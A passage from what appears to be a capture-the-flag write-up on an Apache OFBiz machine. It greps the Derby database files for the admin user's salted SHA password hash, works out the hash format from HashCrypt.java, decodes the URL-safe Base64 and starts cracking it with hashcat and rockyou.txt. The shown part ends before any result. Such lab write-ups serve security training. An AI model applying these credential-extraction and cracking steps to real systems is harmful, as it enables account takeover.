framework/common/config/ftp.properties
framework/common/config/CommonEntityLabels.xml
framework/common/config/SecurityextUiLabels.xml
framework/common/src/main/java/org/apache/ofbiz/common/FtpServices.java
framework/common/src/main/java/org/apache/ofbiz/common/authentication/example/TestFailAuthenticator.java
framework/common/src/main/java/org/apache/ofbiz/common/authentication/example/TestPassAuthenticator.java
framework/common/src/main/java/org/apache/ofbiz/common/authentication/api/Authenticator.java
framework/common/src/main/java/org/apache/ofbiz/common/authentication/AuthHelper.java
framework/common/src/main/java/org/apache/ofbiz/common/email/EmailServices.java
framework/common/src/main/java/org/apache/ofbiz/common/login/LoginServices.java
framework/common/src/main/java/org/apache/ofbiz/common/login/LdapAuthenticationServices.java
framework/common/widget/CommonScreens.xml
framework/common/widget/SecurityScreens.xml
framework/common/widget/SecurityForms.xml
framework/common/servicedef/services_email.xml
framework/common/servicedef/services.xml
framework/common/documents/SendingEmail.xml
framework/common/webcommon/WEB-INF/common-controller.xml
framework/common/webcommon/WEB-INF/security-controller.xml
framework/common/minilang/test/UserLoginTests.xml
framework/datafile/dtd/datafiles.xsd
framework/webtools/config/WebtoolsUiLabels.xml
framework/security/ofbiz-component.xml
framework/security/data/PasswordSecurityDemoData.xml
framework/security/config/security.properties
framework/security/config/jndiLdap.properties
framework/security/src/main/java/org/apache/ofbiz/security/SecurityUtil.java
framework/security/src/docs/asciidoc/_include/sy-impersonation.adoc
framework/security/src/docs/asciidoc/_include/sy-password-and-JWT.adoc
framework/security/src/docs/asciidoc/security.adoc
framework/security/entitydef/entitymodel.xml
DOCKER.md
.gradle/5.0-rc-5/taskHistory/taskHistory.bin
.gradle/5.0-rc-5/javaCompile/classAnalysis.bin
.gradle/5.0-rc-5/javaCompile/jarAnalysis.bin
.gradle/5.0-rc-5/javaCompile/taskHistory.bin
build/classes/java/main/org/apache/ofbiz/accounting/thirdparty/authorizedotnet/AIMPaymentServices.class
build/classes/java/main/org/apache/ofbiz/accounting/thirdparty/eway/EwayServices.class
build/classes/java/main/org/apache/ofbiz/accounting/thirdparty/eway/GatewayRequest.class
build/classes/java/main/org/apache/ofbiz/accounting/thirdparty/clearcommerce/CCPaymentServices.class
build/classes/java/main/org/apache/ofbiz/solr/SolrUtil.class
build/classes/java/main/org/apache/ofbiz/shipment/thirdparty/ups/UpsServices.class
build/classes/java/main/org/apache/ofbiz/shipment/thirdparty/dhl/DhlServices.class
build/classes/java/main/org/apache/ofbiz/shipment/thirdparty/usps/UspsServices.class
build/classes/java/main/org/apache/ofbiz/webapp/event/XmlRpcEventHandler$ServiceRpcHandler.class
build/classes/java/main/org/apache/ofbiz/webapp/event/XmlRpcEventHandler$OfbizRpcAuthHandler.class
build/classes/java/main/org/apache/ofbiz/webapp/webdav/WebDavUtil.class
build/classes/java/main/org/apache/ofbiz/webapp/control/JWTManager.class
build/classes/java/main/org/apache/ofbiz/webapp/control/LoginWorker.class
build/classes/java/main/org/apache/ofbiz/webapp/view/ApacheFopWorker.class
build/classes/java/main/org/apache/ofbiz/entity/datasource/GenericHelperInfo.class
build/classes/java/main/org/apache/ofbiz/entity/config/model/EntityConfig.class
build/classes/java/main/org/apache/ofbiz/entity/config/model/InlineJdbc.class
build/classes/java/main/org/apache/ofbiz/entity/model/ModelEntityChecker.class
build/classes/java/main/org/apache/ofbiz/entity/connection/DBCPConnectionFactory.class
build/classes/java/main/org/apache/ofbiz/entity/jdbc/DatabaseUtil.class
build/classes/java/main/org/apache/ofbiz/entity/GenericDelegator.class
build/classes/java/main/org/apache/ofbiz/widget/renderer/FormStringRenderer.class
build/classes/java/main/org/apache/ofbiz/widget/renderer/macro/MacroFormRenderer.class
build/classes/java/main/org/apache/ofbiz/widget/renderer/fo/FoFormRenderer.class
build/classes/java/main/org/apache/ofbiz/widget/renderer/fo/ScreenFopViewHandler.class
build/classes/java/main/org/apache/ofbiz/widget/model/ModelFieldVisitor.class
build/classes/java/main/org/apache/ofbiz/widget/model/FieldInfo.class
build/classes/java/main/org/apache/ofbiz/widget/model/ModelFormFieldBuilder.class
build/classes/java/main/org/apache/ofbiz/widget/model/ModelFormField.class
build/classes/java/main/org/apache/ofbiz/widget/model/XmlWidgetFieldVisitor.class
build/classes/java/main/org/apache/ofbiz/widget/model/ModelFormField$PasswordField.class
build/classes/java/main/org/apache/ofbiz/widget/artifact/ArtifactInfoGatherer$FieldInfoGatherer.class
build/classes/java/main/org/apache/ofbiz/widget/test/WidgetMacroLibraryTests.class
build/classes/java/main/org/apache/ofbiz/content/ftp/SimpleFtpClient.class
build/classes/java/main/org/apache/ofbiz/content/ftp/FtpServices.class
build/classes/java/main/org/apache/ofbiz/content/ftp/SecureFtpClient.class
build/classes/java/main/org/apache/ofbiz/content/ftp/SshFtpClient.class
build/classes/java/main/org/apache/ofbiz/product/store/ProductStoreWorker.class
build/classes/java/main/org/apache/ofbiz/webpos/session/WebPosSession.class
build/classes/java/main/org/apache/ofbiz/ldap/cas/OFBizCasAuthenticationHandler.class
build/classes/java/main/org/apache/ofbiz/ldap/activedirectory/OFBizActiveDirectoryAuthenticationHandler.class
build/classes/java/main/org/apache/ofbiz/ldap/commons/AbstractOFBizAuthenticationHandler.class
build/classes/java/main/org/apache/ofbiz/ldap/openldap/OFBizLdapAuthenticationHandler.class
build/classes/java/main/org/apache/ofbiz/passport/event/LinkedInEvents.class
build/classes/java/main/org/apache/ofbiz/passport/event/GitHubEvents.class
build/classes/java/main/org/apache/ofbiz/passport/user/LinkedInAuthenticator.class
build/classes/java/main/org/apache/ofbiz/passport/user/GitHubAuthenticator.class
build/classes/java/main/org/apache/ofbiz/service/ModelService.class
build/classes/java/main/org/apache/ofbiz/service/engine/XMLRPCClientEngine.class
build/classes/java/main/org/apache/ofbiz/service/config/model/Server.class
build/classes/java/main/org/apache/ofbiz/service/mail/JavaMailContainer.class
build/classes/java/main/org/apache/ofbiz/service/xmlrpc/AliasSupportedTransportFactory$AliasSupportedTransport.class
build/classes/java/main/org/apache/ofbiz/service/xmlrpc/XmlRpcClient.class
build/classes/java/main/org/apache/ofbiz/service/xmlrpc/AliasSupportedTransportFactory.class
build/classes/java/main/org/apache/ofbiz/service/rmi/socket/ssl/SSLServerSocketFactory.class
build/classes/java/main/org/apache/ofbiz/service/jms/JmsListenerFactory.class
build/classes/java/main/org/apache/ofbiz/service/jms/JmsQueueListener.class
build/classes/java/main/org/apache/ofbiz/service/jms/JmsTopicListener.class
build/classes/java/main/org/apache/ofbiz/service/jms/JmsServiceEngine.class
build/classes/java/main/org/apache/ofbiz/service/test/XmlRpcTests.class
build/classes/java/main/org/apache/ofbiz/service/test/AbstractXmlRpcTestCase.class
build/classes/java/main/org/apache/ofbiz/service/ServiceDispatcher.class
build/classes/java/main/org/apache/ofbiz/service/ModelServiceReader.class
build/classes/java/main/org/apache/ofbiz/catalina/container/CatalinaContainer.class
build/classes/java/main/org/apache/ofbiz/catalina/container/SimpleCredentialHandler.class
build/classes/java/main/org/apache/ofbiz/catalina/container/OFBizRealm.class
build/classes/java/main/org/apache/ofbiz/catalina/container/HashedCredentialHandler.class
build/classes/java/main/org/apache/ofbiz/base/crypto/HashCrypt.class
build/classes/java/main/org/apache/ofbiz/base/util/KeyStoreUtil.class
build/classes/java/main/org/apache/ofbiz/base/util/HttpClient.class
build/classes/java/main/org/apache/ofbiz/base/util/FileUtil.class
build/classes/java/main/org/apache/ofbiz/base/util/UtilHttp.class
build/classes/java/main/org/apache/ofbiz/base/util/SSLUtil.class
build/classes/java/main/org/apache/ofbiz/base/component/ComponentConfig$KeystoreInfo.class
build/classes/java/main/org/apache/ofbiz/common/authentication/example/TestFailAuthenticator.class
build/classes/java/main/org/apache/ofbiz/common/authentication/example/TestPassAuthenticator.class
build/classes/java/main/org/apache/ofbiz/common/authentication/api/Authenticator.class
build/classes/java/main/org/apache/ofbiz/common/authentication/AuthHelper.class
build/classes/java/main/org/apache/ofbiz/common/FtpServices.class
build/classes/java/main/org/apache/ofbiz/common/email/EmailServices.class
build/classes/java/main/org/apache/ofbiz/common/login/LdapAuthenticationServices.class
build/classes/java/main/org/apache/ofbiz/common/login/LoginServices.class
build/classes/java/main/org/apache/ofbiz/security/SecurityUtil.class
build/classes/java/main/org/apache/ofbiz/securityext/login/LoginEvents.class
build/distributions/ofbiz.zip
build/distributions/ofbiz.tar
build/reports/checkstyle/main.xml
build/reports/checkstyle/main.html
build/resources/main/entity-config.xsd
build/resources/main/datafiles.xsd
build/resources/main/ofbiz-component.xsd
build/resources/main/service-config.xsd
build/resources/main/widget-form.xsd
build/resources/main/site-conf.xsd
build/resources/main/ldap.xml
build/resources/main/serviceengine.xml
build/resources/main/entityengine.xml
build/libs/ofbiz.jar
README.adoc
themes/common-theme/template/ForgotPassword.ftl
themes/common-theme/template/macro/XmlFormMacroLibrary.ftl
themes/common-theme/template/macro/FoFormMacroLibrary.ftl
themes/common-theme/template/macro/XlsFormMacroLibrary.ftl
themes/common-theme/template/macro/TextFormMacroLibrary.ftl
themes/common-theme/template/macro/HtmlFormMacroLibrary.ftl
themes/common-theme/template/macro/CsvFormMacroLibrary.ftl
themes/common-theme/template/GetSecurityQuestion.ftl
themes/common-theme/template/ChangePassword.ftl
themes/common-theme/template/Login.ftl
themes/common-theme/webapp/common/js/util/application.js
themes/common-theme/webapp/common/js/jquery/jquery-3.5.1.min.js
themes/common-theme/webapp/common/js/jquery/jquery-3.5.1.js
themes/common-theme/webapp/common/js/jquery/plugins/validate/jquery.validate.min.js
themes/common-theme/webapp/common/js/jquery/plugins/validate/lib/jquery.form.min.js
themes/common-theme/webapp/common/js/jquery/plugins/validate/lib/jquery.form.js
themes/common-theme/webapp/common/js/jquery/plugins/validate/jquery.validate.js
themes/common-theme/webapp/common/js/jquery/plugins/elrte-1.3/src/elrte/js/elRTE.utils.js
themes/common-theme/webapp/common/js/jquery/plugins/elrte-1.3/js/elrte.min.js
themes/common-theme/webapp/common/js/jquery/plugins/elrte-1.3/js/elrte.full.js
themes/common-theme/webapp/common/js/jquery/plugins/hotkeys/jquery.hotkeys-0.8.js
themes/common-theme/webapp/common/js/plugins/imagemanagement/sizzle.js
themes/common-theme/webapp/common/js/plugins/imagemanagement/sizzle.min.map
themes/common-theme/webapp/common/js/plugins/imagemanagement/sizzle.min.js
themes/common-theme/widget/CommonScreens.xml
themes/common-theme/widget/Theme.xml
themes/bluelight/webapp/bluelight/style.css
themes/flatgrey/webapp/flatgrey/style.css
themes/rainbowstone/template/ForgotPassword.ftl
themes/rainbowstone/template/GetSecurityQuestion.ftl
themes/rainbowstone/template/ChangePassword.ftl
themes/rainbowstone/template/Login.ftl
themes/rainbowstone/webapp/rainbowstone/style.css
themes/rainbowstone/webapp/rainbowstone/rainbowstone-main-theme.less
themes/rainbowstone/widget/Theme.xml
themes/tomahawk/webapp/tomahawk/css/style.css
docker/docker-entrypoint.sh
docker/examples/postgres-demo/ofbiz-postgres.env
docker/examples/postgres-demo/postgres-initdb.d/10-init-user-db.sh
docker/examples/postgres-demo/postgres.env
docker/templates/postgres-entityengine.xml
plugins/example/config/ExampleUiLabels.xml
plugins/example/config/examplepdf.properties
plugins/example/widget/example/CommonScreens.xml
plugins/example/widget/example/ExampleScreens.xml
plugins/example/widget/example/ExampleForms.xml
plugins/example/testdef/assertdata/TestUserLoginData.xml
plugins/ebaystore/data/helpdata/HELP_EBAY_NewEbayAccount.xml
plugins/ebaystore/data/DemoEbayStoreData.xml
plugins/ebaystore/widget/EbayAccountForms.xml
plugins/ebaystore/widget/EbayStoreForms.xml
plugins/ebaystore/servicedef/services.xml
plugins/solr/webapp/solr/WEB-INF/controller.xml
plugins/solr/webapp/solr/js/lib/jquery.form.js
plugins/solr/webapp/solr/js/lib/jquery-1.7.2.min.js
plugins/solr/webapp/solr/js/require.js
plugins/solr/webapp/solr/libs/angular.js
plugins/solr/webapp/solr/libs/angular.min.js
plugins/solr/webapp/solr/libs/jquery-2.1.3.min.js
plugins/solr/config/solrconfig.properties
plugins/solr/src/main/java/org/apache/ofbiz/solr/SolrUtil.java
plugins/ecommerce/template/customer/ViewProfile.ftl
plugins/ecommerce/template/customer/profile/NewCustomer.ftl
plugins/ecommerce/template/customer/profile/EditProfile.ftl
plugins/ecommerce/template/customer/NewCustomer.ftl
plugins/ecommerce/template/customer/EditGiftCard.ftl
plugins/ecommerce/template/customer/ChangePassword.ftl
plugins/ecommerce/template/survey/MiniSurvey.ftl
plugins/ecommerce/template/survey/GenericResult.ftl
plugins/ecommerce/template/Login.ftl
plugins/ecommerce/template/RequirePasswordChange.ftl
plugins/ecommerce/data/DemoRentalProduct.xml
plugins/ecommerce/data/DemoPurchasing.xml
plugins/ecommerce/data/DemoTestSurveyData.xml
plugins/ecommerce/webapp/ecommerce/images/forms.css
plugins/ecommerce/webapp/ecommerce/WEB-INF/controller.xml
plugins/ecommerce/config/blog.properties
plugins/ecommerce/config/EcommerceUiLabels.xml
plugins/ecommerce/widget/CommonScreens.xml
plugins/ecommerce/widget/CustomerScreens.xml
plugins/ecommerce/groovyScripts/Login.groovy
plugins/ecommerce/groovyScripts/customer/NewCustomer.groovy
plugins/ecommerce/minilang/misc/AffiliateSimpleEvents.xml
plugins/ecommerce/minilang/misc/AffiliateMapProcs.xml
plugins/ecommerce/minilang/customer/QuickAnonCustomerEvents.xml
plugins/ecommerce/minilang/customer/CustomerEvents.xml
plugins/bizness/webapp/biznessweb/lib/jquery/jquery.min.js
plugins/webpos/template/ForgotPassword.ftl
plugins/webpos/template/GetSecurityQuestion.ftl
plugins/webpos/template/payment/PayCreditCard.ftl
plugins/webpos/template/Login.ftl
plugins/webpos/template/RequirePasswordChange.ftl
plugins/webpos/data/DemoRetail.xml
plugins/webpos/webapp/webpos/images/webpos.css
plugins/webpos/webapp/webpos/WEB-INF/controller.xml
plugins/webpos/src/main/java/org/apache/ofbiz/webpos/session/WebPosSession.java
plugins/webpos/widget/CommonScreens.xml
plugins/webpos/groovyScripts/Login.groovy
plugins/multiflex/webapp/multiflex/style.css
plugins/ldap/config/ldap.xml
plugins/ldap/src/main/java/org/apache/ofbiz/ldap/cas/OFBizCasAuthenticationHandler.java
plugins/ldap/src/main/java/org/apache/ofbiz/ldap/activedirectory/OFBizActiveDirectoryAuthenticationHandler.java
plugins/ldap/src/main/java/org/apache/ofbiz/ldap/commons/AbstractOFBizAuthenticationHandler.java
plugins/ldap/src/main/java/org/apache/ofbiz/ldap/commons/InterfaceOFBizAuthenticationHandler.java
plugins/ldap/src/main/java/org/apache/ofbiz/ldap/openldap/OFBizLdapAuthenticationHandler.java
plugins/scrum/template/includes/DemoTest.ftl
plugins/scrum/data/hookscripts/commit.py
plugins/scrum/data/scrumDemoData.xml
plugins/scrum/config/scrumUiLabels.xml
plugins/scrum/config/revision.properties
plugins/scrum/widget/ResourceForms.xml
plugins/scrum/minilang/ScrumEvents.xml
plugins/scrum/README.md
plugins/passport/webapp/passport/WEB-INF/controller-passport.xml
plugins/passport/src/main/java/org/apache/ofbiz/passport/event/LinkedInEvents.java
plugins/passport/src/main/java/org/apache/ofbiz/passport/event/GitHubEvents.java
plugins/passport/src/main/java/org/apache/ofbiz/passport/user/LinkedInAuthenticator.java
plugins/passport/src/main/java/org/apache/ofbiz/passport/user/GitHubAuthenticator.java
plugins/cmssite/template/ofbiz/OfbizMenu.ftl
plugins/cmssite/template/docbook/roundtrip/dbk2wordml.xsl
plugins/cmssite/template/docbook/roundtrip/template.xml
plugins/cmssite/documents/ApacheOfbizTechnical.xml
plugins/myportal/template/Login.ftl
plugins/myportal/template/RegisterPerson.ftl
plugins/myportal/data/MyPortalDemoData.xml
plugins/myportal/minilang/Events.xml
plugins/projectmgr/ofbiz-component.xml
plugins/projectmgr/data/ProjectMgrDemoPasswordData.xml
build.gradle
.github/workflows/docker-image.yaml

We find some .dat files (data files that hold information specific to a program or application). Let's check what type of file they are:

ofbiz@bizness:/opt/ofbiz$ file runtime/data/derby/ofbiz/seg0/c6010.dat
runtime/data/derby/ofbiz/seg0/c6010.dat: data

It only tells us that the file contains data.

ofbiz@bizness:/opt/ofbiz$ cd runtime/data/derby/ofbiz/seg0/
ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ ls
c10001.dat  c11691.dat  c12d41.dat  c143f1.dat  c1e01.dat  c34a1.dat  c4b50.dat  c6201.dat  c78b1.dat  c8f61.dat  ca611.dat  cbcc1.dat  cd361.dat  cea1.dat
c10011.dat  c116a1.dat  c12d51.dat  c14401.dat  c1e0.dat   c34b0.dat  c4b61.dat  c6210.dat  c78c1.dat  c8f71.dat  ca61.dat   cbcd1.dat  cd371.dat  cea21.dat
c1001.dat   c116b1.dat  c12d61.dat  c14411.dat  c1e10.dat  c34c1.dat  c4b70.dat  c621.dat   c78d1.dat  c8f81.dat  ca621.dat  cbce1.dat  cd381.dat  cea31.dat
c10021.dat  c116c1.dat  c12d71.dat  c1441.dat   c1e21.dat  c34d0.dat  c4b81.dat  c6221.dat  c78e1.dat  c8f91.dat  ca631.dat  cbcf1.dat  cd391.dat  cea41.dat
c10031.dat  c116d1.dat  c12d81.dat  c14421.dat  c1e30.dat  c34e1.dat  c4b90.dat  c6230.dat  c78f1.dat  c8fa1.dat  ca641.dat  cbd01.dat  cd3a1.dat  cea51.dat
c10041.dat  c116e1.dat  c12d91.dat  c14431.dat  c1e41.dat  c34f0.dat  c4ba1.dat  c6241.dat  c7901.dat  c8fb1.dat  ca651.dat  cbd0.dat   cd3b1.dat  cea61.dat
c10051.dat  c116f1.dat  c12da1.dat  c14441.dat  c1e50.dat  c3501.dat  c4bb0.dat  c6250.dat  c790.dat   c8fc1.dat  ca661.dat  cbd11.dat  cd3c1.dat  cea71.dat
c10061.dat  c11701.dat  c12db1.dat  c14451.dat  c1e61.dat  c3510.dat  c4bc1.dat  c6261.dat  c7911.dat  c8fd1.dat  ca671.dat  cbd21.dat  cd3d1.dat  cea81.dat
c10071.dat  c1170.dat   c12dc1.dat  c14461.dat  c1e70.dat  c351.dat   c4bd0.dat  c6270.dat  c7921.dat  c8fe1.dat  ca681.dat  cbd31.dat  cd3e1.dat  cea91.dat
c10081.dat  c11711.dat  c12dd1.dat  c14471.dat  c1e81.dat  c3521.dat  c4be1.dat  c6281.dat  c7931.dat  c8ff1.dat  ca691.dat  cbd41.dat  cd3f1.dat  ceaa1.dat
c10091.dat  c11721.dat  c12de1.dat  c14481.dat  c1e90.dat  c3530.dat  c4bf0.dat  c6290.dat  c7941.dat  c9001.dat  ca6a1.dat  cbd51.dat  cd401.dat  ceab1.dat
c100a1.dat  c11731.dat  c12df1.dat  c14491.dat  c1ea1.dat  c3541.dat  c4c01.dat  c62a1.dat  c7951.dat  c9011.dat  ca6b1.dat  cbd61.dat  cd411.dat  ceac1.dat
c100b1.dat  c11741.dat  c12e01.dat  c144a1.dat  c1eb0.dat  c3550.dat  c4c10.dat  c62b0.dat  c7961.dat  c901.dat   ca6c1.dat  cbd71.dat  cd41.dat   cead1.dat
c100c1.dat  c11751.dat  c12e11.dat  c144b1.dat  c1ec1.dat  c3561.dat  c4c1.dat   c62c1.dat  c7971.dat  c9021.dat  ca6d1.dat  cbd81.dat  cd421.dat  ceae1.dat
c100d1.dat  c11761.dat  c12e1.dat   c144c1.dat  c1ed0.dat  c3570.dat  c4c21.dat  c62d0.dat  c7981.dat  c9031.dat  ca6e1.dat  cbd91.dat  cd431.dat  ceaf1.dat
c100e1.dat  c11771.dat  c12e21.dat  c144d1.dat  c1ee1.dat  c3581.dat  c4c30.dat  c62e1.dat  c7991.dat  c9041.dat  ca6f1.dat  cbda1.dat  cd441.dat  ceb01.dat
c100f1.dat  c11781.dat  c12e31.dat  c144e1.dat  c1ef0.dat  c3590.dat  c4c41.dat  c62f0.dat  c79a1.dat  c9051.dat  ca701.dat  cbdb1.dat  cd451.dat  ceb0.dat
c10101.dat  c11791.dat  c12e41.dat  c144f1.dat  c1f01.dat  c35a1.dat  c4c50.dat  c6301.dat  c79b1.dat  c9061.dat  ca70.dat   cbdc1.dat  cd461.dat  ceb11.dat
c1010.dat   c117a1.dat  c12e51.dat  c14501.dat  c1f10.dat  c35b0.dat  c4c61.dat  c630.dat   c79c1.dat  c9071.dat  ca711.dat  cbdd1.dat  cd471.dat  ceb21.dat
c10111.dat  c117b1.dat  c12e61.dat  c1450.dat   c1f1.dat   c35c1.dat  c4c70.dat  c6310.dat  c79d1.dat  c9081.dat  ca721.dat  cbde1.dat  cd481.dat  ceb31.dat
c10121.dat  c117c1.dat  c12e71.dat  c14511.dat  c1f21.dat  c35d0.dat  c4c81.dat  c6321.dat  c79e1.dat  c9091.dat  ca731.dat  cbdf1.dat  cd491.dat  ceb41.dat
c10131.dat  c117d1.dat  c12e81.dat  c14521.dat  c1f30.dat  c35e1.dat  c4c90.dat  c6330.dat  c79f1.dat  c90a1.dat  ca741.dat  cbe01.dat  cd4a1.dat  ceb51.dat
c10141.dat  c117e1.dat  c12e91.dat  c14531.dat  c1f41.dat  c35f0.dat  c4ca1.dat  c6341.dat  c7a01.dat  c90b1.dat  ca751.dat  cbe11.dat  cd4b1.dat  ceb61.dat
c10151.dat  c117f1.dat  c12ea1.dat  c14541.dat  c1f50.dat  c3601.dat  c4cb0.dat  c6350.dat  c7a11.dat  c90c1.dat  ca761.dat  cbe1.dat   cd4c1.dat  ceb71.dat
c10161.dat  c11801.dat  c12eb1.dat  c14551.dat  c1f61.dat  c3610.dat  c4cc1.dat  c6361.dat  c7a1.dat   c90d1.dat  ca771.dat  cbe21.dat  cd4d1.dat  ceb81.dat
.......... 
.......... 
.......... 
README_DO_NOT_TOUCH_FILES.txt
c115d1.dat  c12c81.dat  c14321.dat  c1d30.dat   c33e1.dat  c4a90.dat  c6130.dat  c77f1.dat  c8ea1.dat  ca541.dat  cbc01.dat  cd2a1.dat  ce951.dat
c115e1.dat  c12c91.dat  c14331.dat  c1d41.dat   c33f0.dat  c4aa1.dat  c6141.dat  c7801.dat  c8eb1.dat  ca551.dat  cbc11.dat  cd2b1.dat  ce961.dat
c115f1.dat  c12ca1.dat  c14341.dat  c1d50.dat   c3401.dat  c4ab0.dat  c6150.dat  c7811.dat  c8ec1.dat  ca561.dat  cbc1.dat   cd2c1.dat  ce971.dat
c11601.dat  c12cb1.dat  c14351.dat  c1d61.dat   c340.dat   c4ac1.dat  c6161.dat  c781.dat   c8ed1.dat  ca571.dat  cbc21.dat  cd2d1.dat  ce981.dat
c11611.dat  c12cc1.dat  c14361.dat  c1d70.dat   c3410.dat  c4ad0.dat  c6170.dat  c7821.dat  c8ee1.dat  ca581.dat  cbc31.dat  cd2e1.dat  ce991.dat
c1161.dat   c12cd1.dat  c14371.dat  c1d81.dat   c3421.dat  c4ae1.dat  c6181.dat  c7831.dat  c8ef1.dat  ca591.dat  cbc41.dat  cd2f1.dat  ce9a1.dat
c11621.dat  c12ce1.dat  c14381.dat  c1d90.dat   c3430.dat  c4af0.dat  c6190.dat  c7841.dat  c8f01.dat  ca5a1.dat  cbc51.dat  cd301.dat  ce9b1.dat
c11631.dat  c12cf1.dat  c14391.dat  c1da1.dat   c3441.dat  c4b01.dat  c61a1.dat  c7851.dat  c8f0.dat   ca5b1.dat  cbc61.dat  cd30.dat   ce9c1.dat
c11641.dat  c12d01.dat  c143a1.dat  c1db0.dat   c3450.dat  c4b0.dat   c61b0.dat  c7861.dat  c8f11.dat  ca5c1.dat  cbc71.dat  cd311.dat  ce9d1.dat
c11651.dat  c12d0.dat   c143b1.dat  c1dc1.dat   c3461.dat  c4b10.dat  c61c1.dat  c7871.dat  c8f21.dat  ca5d1.dat  cbc81.dat  cd321.dat  ce9e1.dat
c11661.dat  c12d11.dat  c143c1.dat  c1dd0.dat   c3470.dat  c4b21.dat  c61d0.dat  c7881.dat  c8f31.dat  ca5e1.dat  cbc91.dat  cd331.dat  ce9f1.dat
c11671.dat  c12d21.dat  c143d1.dat  c1de1.dat   c3481.dat  c4b30.dat  c61e1.dat  c7891.dat  c8f41.dat  ca5f1.dat  cbca1.dat  cd341.dat  cea01.dat
c11681.dat  c12d31.dat  c143e1.dat  c1df0.dat   c3490.dat  c4b41.dat  c61f0.dat  c78a1.dat  c8f51.dat  ca601.dat  cbcb1.dat  cd351.dat  cea11.dat
ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ cat README_DO_NOT_TOUCH_FILES.txt 

# *************************************************************************
# ***              DO NOT TOUCH FILES IN THIS DIRECTORY!                ***
# *** FILES IN THIS DIRECTORY ARE USED BY THE DERBY DATABASE TO STORE   *** 
# *** USER AND SYSTEM DATA. EDITING, ADDING, OR DELETING FILES IN THIS  ***
# *** DIRECTORY WILL CORRUPT THE ASSOCIATED DERBY DATABASE AND MAKE     ***
# *** IT NON-RECOVERABLE.                                               ***
# *************************************************************************
ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ 

Earlier, the grep output included a class that could tell us something:

ofbiz@bizness:/opt/ofbiz$ cat framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java 

.....
   ....
....
    public static String cryptBytes(String hashType, String salt, byte[] bytes) {
        if (hashType == null) {
            hashType = "SHA";
        }
        if (salt == null) {
            salt = RandomStringUtils.random(new SecureRandom().nextInt(15) + 1, CRYPT_CHAR_SET);
        }
        StringBuilder sb = new StringBuilder();
        sb.append("$").append(hashType).append("$").append(salt).append("$");
        sb.append(getCryptedBytes(hashType, salt, bytes));
        return sb.toString();
    }

    private static String getCryptedBytes(String hashType, String salt, byte[] bytes) {
        try {
            MessageDigest messagedigest = MessageDigest.getInstance(hashType);
            messagedigest.update(salt.getBytes(UtilIO.getUtf8()));
            messagedigest.update(bytes);
            return Base64.encodeBase64URLSafeString(messagedigest.digest()).replace('+', '.');
        } catch (NoSuchAlgorithmException e) {
            throw new GeneralRuntimeException("Error while comparing password", e);
        }
    }

    .....
    ....

    ....
    ..

This line of the cryptBytes method is interesting because it shows the format of the stored value:

sb.append("$").append(hashType).append("$").append(salt).append("$");

The getCryptedBytes method performs the hashing and returns the result as a URL-safe Base64-encoded string.

            return Base64.encodeBase64URLSafeString(messagedigest.digest()).replace('+', '.');

So we apply this regular expression to find strings that appear to follow the password format implemented in the Java cryptBytes method, which includes a hash algorithm type followed by a salt.

ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ grep -E '\$\w+\$\w+\$' * --text
c54d0.dat:                <eeval-UserLogin createdStamp="2023-12-16 03:40:23.643" createdTxStamp="2023-12-16 03:40:23.445" currentPassword="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I" enabled="Y" hasLoggedOut="N" lastUpdatedStamp="2023-12-16 03:44:54.272" lastUpdatedTxStamp="2023-12-16 03:44:54.213" requirePasswordChange="N" userLoginId="admin"/>
c6650.dat:;fPUUUNNNNUUUUUUsystemYN

                                  '""

                                     ' :

                                        &6)]

                                            &system
                                                  	anonymousN

                                                                  &6,P

                                                                      &6

                                                                        &6,P

                                                                            &6	admin$"$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2IYNN

                                                                                                                            ,66d

                                                                                                                                ,6
                                                                                                                                  @

                                                                                                                                   (&Sf

                                                                                                                                       ()@
                                                                                                                                          ()@>
                                                                                                                                              [}f<A6

If we look at the encodeBase64URLSafeString method, the URL-safe variant of Base64 (uP0_QaVBpDWFeo8-dRzDqRwXQ2I) replaces the characters + and / with - and _, respectively. In addition, no padding character is appended to the end of the string. Reversing the substitution gives the standard Base64 form (uP0/QaVBpDWFeo8+dRzDqRwXQ2I).

These are two SHA hash modes that could match:

❯ hashcat --example-hashes | less

Hash mode #110
  Name................: sha1($pass.$salt)
  Category............: Raw Hash salted and/or iterated
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Generic
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: 848952984db93bdd2d0151d4ecca6ea44fcf49e3:30007548152
  Example.Pass........: hashcat
  Benchmark.Mask......: ?b?b?b?b?b?b?b
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX
:

Hash mode #120
  Name................: sha1($salt.$pass)
  Category............: Raw Hash salted and/or iterated
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Generic
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: a428863972744b16afef28e0087fc094b44bb7b1:465727565
  Example.Pass........: hashcat
  Benchmark.Mask......: ?b?b?b?b?b?b?b
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX


On this page we can perform that character replacement, decode the result from Base64 and convert it to hex.

❯ hashcat -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode


The following 15 hash-modes match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
    110 | sha1($pass.$salt)                                          | Raw Hash salted and/or iterated
    120 | sha1($salt.$pass)                                          | Raw Hash salted and/or iterated
   4900 | sha1($salt.$pass.$salt)                                    | Raw Hash salted and/or iterated
   4520 | sha1($salt.sha1($pass))                                    | Raw Hash salted and/or iterated
  24300 | sha1($salt.sha1($pass.$salt))                              | Raw Hash salted and/or iterated
    140 | sha1($salt.utf16le($pass))                                 | Raw Hash salted and/or iterated
   4710 | sha1(md5($pass).$salt)                                     | Raw Hash salted and/or iterated
